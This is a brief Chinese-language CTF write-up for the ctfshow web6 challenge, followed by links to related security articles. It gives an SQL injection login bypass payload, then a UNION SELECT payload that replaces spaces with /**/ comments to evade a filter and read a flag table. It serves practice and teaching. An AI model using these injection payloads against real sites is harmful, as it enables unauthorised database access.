ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
FreeBuf_33 分钟前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
Xudde.1 小时前
班级作业笔记报告0x08
笔记·学习·安全·web安全
Xudde.3 小时前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX12294 小时前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_738120724 小时前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
鹅天帝4 小时前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
爱思考的发菜_汽车网络信息安全4 小时前
汽车网络安全:ECC算法详细解析
安全·web安全·汽车
运维行者_4 小时前
MSP网络管理破局者:IPAM+SPM插件终结IP冲突与安全威胁
运维·服务器·开发语言·网络·安全·web安全·php
买大橘子也用券4 小时前
第一届 Polaris CTF 招新赛(部分web) wp
web安全·网络安全
李豆豆喵4 小时前
008-基础入门-不回显不出网&演示环境&源码项目等
web安全